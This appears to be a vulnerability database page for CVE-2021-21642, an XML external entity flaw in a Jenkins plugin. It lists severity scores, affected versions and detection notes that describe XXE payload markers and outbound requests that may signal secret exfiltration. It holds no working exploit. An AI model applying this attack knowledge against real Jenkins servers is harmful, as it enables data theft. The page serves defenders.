cbcvebase.
CVE-2021-21642
published 2021-04-21

CVE-2021-21642: Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

PriorityP261high8.1CVSS 3.1
AVNACLPRLUINSUCHIHAN
EPSS
37.83%
98.4th percentile
Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

Affected

7 ranges
VendorProductVersion rangeFixed in
jenkinscloudbees_cd_plugin
jenkinsconfig_file_provider<= 3.7.0
jenkinsconfig_file_provider_plugin
jenkinsids_in_config_file_provider_plugin
jenkinsscript_security_plugin
jenkinstemplating_engine_plugin
jenkins_projectjenkins_config_file_provider_pluginunspecified – 3.7.0

Detection & IOCsextracted from sources · hover to see the quote

  • An attacker must have the ability to define Maven configuration files in Jenkins to exploit this XXE vulnerability; monitor for unexpected or newly created Maven config files in the Config File Provider Plugin.
  • The attack vector is a crafted XML configuration file containing external entity declarations; inspect Maven configuration files managed by the plugin for XXE payloads (e.g., DOCTYPE declarations with SYSTEM or PUBLIC entity references).
  • Outbound DNS or HTTP requests originating from the Jenkins controller process may indicate XXE-based SSRF or secret exfiltration exploitation of this vulnerability.
  • ·Affected versions are Config File Provider Plugin 3.7.0 and earlier; the XML parser is not configured to prevent XXE attacks in these versions.
  • ·No practical mitigation short of patching has been identified by Red Hat; upgrading the plugin is the only recommended remediation.

CVSS provenance

nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
nvdv2.05.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:N
vendor_redhat8.1HIGH
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.